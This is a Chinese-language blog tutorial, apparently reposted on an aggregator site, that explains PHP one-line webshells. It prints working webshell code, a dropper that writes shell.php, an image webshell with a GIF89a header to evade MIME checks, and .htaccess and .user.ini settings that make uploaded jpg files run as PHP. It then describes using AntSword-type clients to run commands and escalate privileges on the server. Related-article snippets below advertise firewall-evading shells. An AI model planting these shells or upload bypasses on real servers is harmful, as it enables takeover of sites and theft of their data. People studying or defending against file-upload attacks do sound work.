你真的了解一句话木马吗?

这篇具有很好参考价值的文章主要介绍了你真的了解一句话木马吗?。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、前言:

二、什么是一句话木马:

三、常见的一句话木马:

木马讲解:

1、$_POST[cmd]

2、eval()

3、"@"

4、脉络梳理

四、可用于条件竞争的一句话木马:

木马讲解:

1、fopen()

2、fputs()

 3、脉络梳理

五、图片马

1、什么是图片马:

2、.htaccess

3、木马图片

4.   .user.ini扩展

六、一句话木马进一步利用

1、连接

2、利用


一、前言:

  一句话木马是大多网安人在初步学习中,就遇到的一种简单的木马文件,相信很多人都像博主一样在接触到这一段代码时,都会感到非常的神奇,通过这样一段代码就能控制服务器,但却不知道其中的原理,在学习PHP之后才明白其构成,今天博主就带大家浅析一下一句话木马,也算是朝花夕拾吧,感兴趣的可以访问下我的博客http://blog.byzhb.top/

二、什么是一句话木马:

  一句话木马是一种短小精悍的恶意代码,通常只有一行之长。这种木马可以利用一些漏洞,以上传文件、修改配置等方式将恶意代码植入到受害者服务器上,然后通过一些特殊手法在服务器端执行,以达到入侵控制目的。攻击者可以使用一句话木马来窃取网站的敏感信息、篡改网站内容、攻击其他网站、制造破坏等。由于一句话木马具有体积小、隐蔽性强等特点,在黑客攻击中非常常见。

三、常见的一句话木马:

我们接触的一句话木马大多为这种,该木马使用了PHP语言,需要在有PHP环境的站点中才可使用

<?php @eval($_POST[cmd]);  ?>

木马讲解:

1、$_POST[cmd]

$_POST 是 PHP 中的一个超全局变量,我们在浏览器中POST方式提交的所有变量,都会保存在此数组中,变量名即为键名

2、eval()

eval() 函数在 PHP 中用于执行字符串中的代码并返回执行结果。该函数接受一个字符串作为参数,该字符串包含要执行的 PHP 代码(在此代码中为$_POST[cmd]),然后执行该代码,并且可以返回结果

该函数对php语法要求严格,所传入语句必须以" ; "号结尾

3、"@"

符号"@"的作用是 屏蔽该语句的报错信息,也就是所即使该语句执行错误也不会显示报错信息,如果站点PHP版本>=8.0的话,访问不带"@"的一句话木马会显示如下:

你真的了解一句话木马吗?

 原因是:php自8.0版本之后会对使用未定义的变量进行报错

我们初步访问此木马时并没有对其变量传值,固然会报错

4、脉络梳理

该木马的大体意思为,用eval函数,将我们post方式提交的名为cmd的变量,当做PHP代码执行,cmd变量可为任何攻击代码

四、可用于条件竞争的一句话木马:

关于什么是条件竞争请看博主的这篇文章http://t.csdn.cn/RFAgE

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd]);  ?>' ); ?>

木马讲解:

1、fopen()

该函数的格式为 fopen(filename,mode,include_path,context)

你真的了解一句话木马吗?

fopen('shell.php','w')

该语句的意思为,以写入方式打开一个叫做“ shell.php ”,的文件,该文件不存在,故创建了一个shell.php文件

2、fputs()

该函数格式为  fputs(file,string,length)

你真的了解一句话木马吗?

fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd]);  ?>' )

file参数对应   fopen('shell.php','w') 语句生成的shell.php文件

string参数对应   '<?php @eval($_POST[cmd]);  ?>'  这条字符串

也就是说把木马语句写入到了shell.php中

 3、脉络梳理

该函数首先借用fopen函数w方式,创建了shell.php文件,然后用fputs函数'<?php @eval($_POST[cmd]);  ?>'  写入了该文件

换而言之,一旦访问该文件,就会生成一个名为shell.php的一句话木马,木马的内容在上文已讲过

五、图片马

1、什么是图片马:

在站点禁止上传php文件时,我们可以将含有一句话木马的jpg(也可以是其他img格式)图片,配合.htaccess文件,将其解析成php文件

2、.htaccess

该配置文件仅Apache服务器可用

文件内容为

<FilesMatch "jpg">  
SetHandler application/x-httpd-php
</FilesMatch>
//大体意思是设置当前目录所有带jpg的文件名都使用php解析,那么无论上传任何文件,只要符合php语言代码规范,就会被当做PHP执行。不符合规则,则报错

然后命名为  .htaccess  并上传

3、木马图片

文件内容为

GIF89a
<?php @eval($_POST[cmd]);  ?>

//GIF89a 为了绕过可能存在的MIME头检测

然后命名为 shell.jpg 并上传,上传后访问其路径便可以传参

4.   .user.ini扩展

文件内容为

auto_prepend_file=shell.jpg

//意思就是当前目录中的php文件的页头会自动去包含shell.jpg中的文件内容
auto_append_file 是页尾包含

文件名为  .user.ini

操作步骤和 .htaccess相似

六、一句话木马进一步利用

我们可以通过蚁剑、菜刀、冰蝎等webshell工具,来更加彻底的利用一句话木马,这里以蚁剑为例

1、连接

你真的了解一句话木马吗?

url地址为 站点url+木马上传路径

连接密码为 shell.php中POST的变量名

2、利用

在连接成功后,便可以遍历网站服务器目录,执行命令操作,或进行进行一步提权操作

你真的了解一句话木马吗?文章来源地址https://www.toymoban.com/news/detail-441090.html

到了这里,关于你真的了解一句话木马吗?的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 渗透干货|史上最全一句话木马

    PHP //可执行命令一句话 普通一句话 PHP系列 过狗一句话 【----帮助网安学习,以下所有学习资料文末免费领!----】 几个变性的php–过防火墙 过狗效果都不错: 密码-7 phpv9 高版本拿shell ASP asp 一句话 ASP过安全狗一句话 ASPX系列 ASPX一句话的 过安全狗效果不怎么样 不过我认为能

    2024年04月25日
    浏览(45)
  • 一句话木马攻击复现:揭示黑客入侵的实战过程

    这篇文章旨在用于网络安全学习,请勿进行任何非法行为,否则后果自负。 准备环境 OWASP虚拟机 xfp 7与xshell 7 ​  DVWA系统默认的账号密码均为:admin/admin  ​ 攻击payload 这个命令的目的是在服务器上创建一个名为 shell.php 的文件,其中包含 PHP 代码。让我们逐步分析该命令:

    2024年02月11日
    浏览(54)
  • 上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

       可抓包后修改扩展名为图片格式,再上传可绕过验证。如:   可以修改php文件后缀为其他,再上传。如test.php.xxx  可对图片文件添加一句话木马,再修改为.php上传,会解析为图片上传此文件。    客户端验证绕过的方法有:  例:   1)木马分为大马、小马和一句话木马:

    2024年02月11日
    浏览(44)
  • PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示

    一句话木马如下,利用文件上传漏洞,往目标网站上传该木马,即可获取和控制整个网站主机目录 @符号 @符号表示后面的语句即使执行错误,也不报错。 eval()函数 eval()函数的作用是把括号内的字符串全部当作php代码来执行。 $_POST[\\\'hack\\\'] post方法是html中form标签中的方法,在页

    2023年04月09日
    浏览(33)
  • 一句话解释什么是出口IP

    出口 IP 是指从本地网络连接到公共互联网时所使用的 IP 地址。这个 IP 地址是由 Internet 服务提供商(ISP)分配给你的,它可以用来标识你的网络流量的来源。如果你使用的是 NAT(网络地址转换)技术,则在 NAT 设备内部会进行地址转换,使得多个设备可以共享同一个公共 I

    2024年02月08日
    浏览(41)
  • 阿里三面过了,却无理由挂了,HR反问一句话:为什么不考虑阿里?

    进入互联网大厂一般都是“过五关斩六将”,难度堪比西天取经,但当你真正面对这些大厂的面试时,有时候又会被其中的神操作弄的很是蒙圈。 近日,某位测试员发帖称,自己去阿里面试,三面都过了,却被无理由挂了,阿里某部门HR还问他为何不考虑阿里。当时这位程序

    2024年02月06日
    浏览(57)
  • 微软发布Fabric_Ai Copilot助力数据分析_一句话让他做数据挖掘和分析_数据分析师_设计师_程序员_真的要失业了吗---数据设计分析001

    前段时间微软发布的AI Copilot,可以嵌入到Worldl,Excel,PPT中帮助进行智能的绘图,分析等操作, 今天~ Fabric 是自 SQL Server 以来最重要的数据平台创新,是对 Power BI 和分析平台最重要的扩展。 微软发布了一个东西,叫 Fabric。第一,它是一个彻底统一的分析平台,包括了:大数据,数据

    2024年02月11日
    浏览(59)
  • 一句话生成长视频

    前段时间,我曾经介绍过Imagen Video模型。它能够在输入一句话中,生成5~6秒的视频。而且由于采用了“空间高分辨率模型”和“时域高分辨率模型”的级联模型,它能够清晰度在1280×768的高清视频。具体的介绍可以回看我之前写的文章: 短视频模型Imagen Video:艺术和3D建模大

    2023年04月09日
    浏览(42)
  • 一句话画出动漫效果

     链接: AI Comic Factory - a Hugging Face Space by jbilcke-hf Discover amazing ML apps made by the community https://huggingface.co/spaces/jbilcke-hf/ai-comic-factory 选择类型: Japanese  输入提示词: 效果如下:

    2024年02月10日
    浏览(57)
  • 文件上传漏洞—一句话图片马制作

    提要 :在文件上传漏洞中,通常需要上传脚本类型的文件至服务端执行,获取WebShell,但是网站会严格过滤脚本类型的文件,这个时候便可以通过图片马来尝试突破。 简介 :在图片格式文件(JPG,PNG和GIF等)中添加隐藏一句话木马,利用文件包含漏洞,Web容器解析漏洞和.

    2024年02月07日
    浏览(52)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包